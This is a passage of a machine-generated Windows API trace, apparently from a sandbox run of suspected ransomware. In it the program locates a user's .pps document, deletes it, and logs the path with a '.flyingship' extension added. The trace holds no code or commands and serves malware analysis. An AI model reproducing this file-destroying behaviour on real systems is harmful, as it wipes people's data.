Size=0x4) returned 0x8e1aa0 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.290] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0179.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd5d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0179.291] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0179.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0179.291] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.291] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps", lpFilePart=0x0) returned 0x5d [0179.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x820ae690, ftCreationTime.dwHighDateTime=0x1d5dced, ftLastAccessTime.dwLowDateTime=0xd1f6a5e0, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0x102355c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x5d90, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="izNb7DZLOKQSO_3S.pps", cAlternateFileName="IZNB7D~1.PPS")) returned 0x90af58 [0179.292] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\iznb7dzlokqso_3s.pps")) returned 1 [0179.294] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x820ae690, ftCreationTime.dwHighDateTime=0x1d5dced, ftLastAccessTime.dwLowDateTime=0xd1f6a5e0, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0x102355c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x5d90, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="izNb7DZLOKQSO_3S.pps", cAlternateFileName="IZNB7D~1.PPS")) returned 0 [0179.294] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0179.294] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.295] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.295] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.295] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.296] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.296] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.296] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.296] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.297] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.297] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.297] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0179.297] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.297] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.297] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0179.297] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1a61, lpOverlapped=0x0) returned 1 [0179.297] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0179.298] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1a61, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.298] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0179.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.flyingship.pps\r\n", cchWideChar=107, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0179.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.flyingship.pps\r\n", cchWideChar=107, lpMultiByteStr=0x906f38, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.flyingship.pps\r\n", lpUsedDefaultChar=0x0) returned 107 [0179.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0179.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0179.298] WriteFile (in: hFile=0x120, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x6a, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x6a, lpOverlapped=0x0) returned 1 [0179.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0179.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.298] CloseHandle (hObject=0x120) returned 1 [0179.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0179.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0179.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0179.302] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0179.302] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.303] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0179.303] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.303] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0179.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.304] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0179.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0179.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0179.304] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0179.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0179.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0179.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0179.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0179.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 